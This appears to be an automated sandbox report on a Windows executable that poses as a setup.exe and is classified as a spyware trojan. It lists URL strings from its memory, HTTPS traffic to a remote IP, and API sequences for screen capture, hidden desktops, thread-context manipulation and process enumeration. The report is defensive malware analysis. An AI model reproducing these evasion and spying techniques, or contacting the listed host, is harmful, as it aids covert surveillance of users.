Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, vaim7g.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/all-in-one.htmStreamFabhttps://www.dvdfab.cn/streamfab-product.htm?page=downlo
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/player7.htm?soft=playerfab&ad=playerfab_client_update&downloadmode=1&v=
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/player7.htm?soft=playerfab&ad=playerfab_client_update&v=
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/player7.htm?soft=playerfab&ad=playerfab_client_update_old&platform=x64&v=
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/player7.htm?soft=playerfab&ad=playerfab_client_update_old&v=
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=playerfab&ad=playerfab_client_thankyou&downloadmode=1&v=
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=playerfab&ad=playerfab_client_thankyou&v=
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_%1%&downloadmode=1&pid=%
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_abematv&downloadmode=1&p
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_amazon&downloadmode=1&pi
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_apple-tv-plus&downloadmo
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_crunchyroll&downloadmode
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_discovery-plus&downloadm
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_disney-plus&downloadmode
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_espn-plus&downloadmode=1
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_fod&downloadmode=1&pid=f
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_funimation&downloadmode=
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_hbo&downloadmode=1&pid=h
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_hulu&downloadmode=1&pid=
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_joyn&downloadmode=1&pid=
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_netflix&downloadmode=1&p
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_olympic-games&downloadmo
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_paramount-plus&downloadm
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_paravi&downloadmode=1&pi
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_peacock&downloadmode=1&p
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_r18&downloadmode=1&pid=r
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_rakuten-tv&downloadmode=
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_shahid&downloadmode=1&pi
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_tvnow&downloadmode=1&pid
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_u-next&downloadmode=1&pi
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_video&downloadmode=1&pid
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/thankyou.htm?s=streamfab&ad=streamfab_client_thankyou_youtube-movies&downloadm
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/uninstall-software.htm
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cn/video-enhancer-ai.htm
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.dvdfab.cnDVDFab
Source: Cm2GRjWK1C.exe, 00000000.00000002.1679863206.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475999818.00001ECC02FC0000.00000004.00001000.00020000.00000000.sdmp, x4wbi5.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Cm2GRjWK1C.exe, 00000000.00000002.1678369352.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, vaim7g.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000008.00000002.1467250234.00000241C2FC7000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000008.00000002.1479007037.00001ECC039D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000008.00000002.1479380514.00001ECC03AEC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000008.00000002.1474929281.00001ECC02B58000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/#safe
Source: chrome.exe, 00000008.00000002.1474964004.00001ECC02B8C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-features/
Source: chrome.exe, 00000008.00000002.1474964004.00001ECC02B8C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-tools/
Source: chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
Source: chrome.exe, 00000008.00000002.1476937486.00001ECC032E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475974465.00001ECC02F94000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475565347.00001ECC02DA4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: Cm2GRjWK1C.exe, 00000000.00000002.1679863206.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1474315925.00001ECC02A15000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1472882586.00001ECC02584000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473665659.00001ECC027D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475999818.00001ECC02FC0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473729232.00001ECC02874000.00000004.00001000.00020000.00000000.sdmp, x4wbi5.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 00000008.00000002.1473241743.00001ECC025E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000008.00000002.1473322628.00001ECC0261C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chromecache_69.9.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_69.9.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000008.00000003.1381943622.00001EC8004AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1382033511.00001EC8004C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381914026.00001EC800498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381994816.00001EC8004B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000008.00000003.1381943622.00001EC8004AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1382033511.00001EC8004C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381914026.00001EC800498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381994816.00001EC8004B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerForcedOn_PlusAddressAndroidOpenGmsCoreManagementP
Source: chrome.exe, 00000008.00000003.1381943622.00001EC8004AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1382033511.00001EC8004C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381914026.00001EC800498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381994816.00001EC8004B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerPlusAddressOfferCreationIfPasswordFieldIsNotVisib
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000008.00000002.1474315925.00001ECC02A04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478719610.00001ECC03738000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chromecache_71.9.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_71.9.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_71.9.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: chrome.exe, 00000008.00000002.1479519475.00001ECC03BD4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000008.00000003.1417706720.00001ECC03998000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418621822.00001ECC03C58000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1479519475.00001ECC03BD4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000008.00000002.1476937486.00001ECC032E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418547462.00001ECC03C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.eebVy_fNKiM.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000008.00000002.1479497325.00001ECC03BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418621822.00001ECC03C58000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417857151.00001ECC02774000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418547462.00001ECC03C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.sDa5bc0wD58.L.W.O/m=qmd
Source: Cm2GRjWK1C.exe, 00000000.00000002.1681344018.00000000049F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Cm2GRjWK1C.exe, 00000000.00000002.1681344018.00000000049F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Cm2GRjWK1C.exe, 00000000.00000002.1681344018.00000000049F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Cm2GRjWK1C.exe, 00000000.00000002.1681344018.00000000049F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Cm2GRjWK1C.exe, 00000000.00000002.1681344018.00000000049F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473322628.00001ECC0261C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 95.217.30.53:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.30.53:443 -> 192.168.2.4:49734 version: TLS 1.2

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D50A90 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,malloc,StrCmpCW,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,ReleaseDC,CloseWindow,

0_3_02D50A90

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D46480 memcpy,OpenDesktopA,CreateDesktopA,lstrcpy,CreateProcessA,Sleep,CloseDesktop,

0_3_02D46480

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_01010B72 NtGetContextThread,NtSetContextThread,NtResumeThread,	0_3_01010B72
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_0101066E NtProtectVirtualMemory,	0_3_0101066E
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_01010CD8 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_3_01010CD8
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_010110E8 NtTerminateThread,	0_3_010110E8
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C11E78 NtProtectVirtualMemory,	0_2_02C11E78
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C11E3A NtFreeVirtualMemory,	0_2_02C11E3A
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C11DE7 NtAllocateVirtualMemory,	0_2_02C11DE7

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D44A20	0_3_02D44A20
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D58630	0_3_02D58630
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D593D0	0_3_02D593D0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D5A7D0	0_3_02D5A7D0
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D5B770	0_3_02D5B770
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D5B300	0_3_02D5B300
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_3_02D5C100	0_3_02D5C100
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C103DD	0_2_02C103DD
Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe	Code function: 0_2_02C10000	0_2_02C10000

Source: Cm2GRjWK1C.exe

Static PE information: invalid certificate

Source: Cm2GRjWK1C.exe	Binary or memory string: OriginalFilename vs Cm2GRjWK1C.exe
Source: Cm2GRjWK1C.exe, 00000000.00000002.1677584417.0000000000965000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesetup.exeJ vs Cm2GRjWK1C.exe
Source: Cm2GRjWK1C.exe, 00000000.00000002.1679863206.00000000044C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Cm2GRjWK1C.exe
Source: Cm2GRjWK1C.exe	Binary or memory string: OriginalFilenamesetup.exeJ vs Cm2GRjWK1C.exe

Source: Cm2GRjWK1C.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/24@6/6

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Code function: 0_3_02D51250 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_3_02D51250

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\38E3REAV.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03

Source: Cm2GRjWK1C.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Cm2GRjWK1C.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000008.00000002.1479678271.00001ECC03C90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
Source: chrome.exe, 00000008.00000002.1479678271.00001ECC03C90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
Source: chrome.exe, 00000008.00000002.1477123076.00001ECC033B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1472330345.00001ECC02398000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1472710930.00001ECC024F8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
Source: chrome.exe, 00000008.00000002.1474740820.00001ECC02B2F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000008.00000002.1472330345.00001ECC02398000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;s
Source: chrome.exe, 00000008.00000002.1472330345.00001ECC02398000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;s
Source: chrome.exe, 00000008.00000002.1479678271.00001ECC03C90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
Source: chrome.exe, 00000008.00000002.1477123076.00001ECC033B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1472330345.00001ECC02398000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1472710930.00001ECC024F8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
Source: chrome.exe, 00000008.00000002.1479678271.00001ECC03C90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
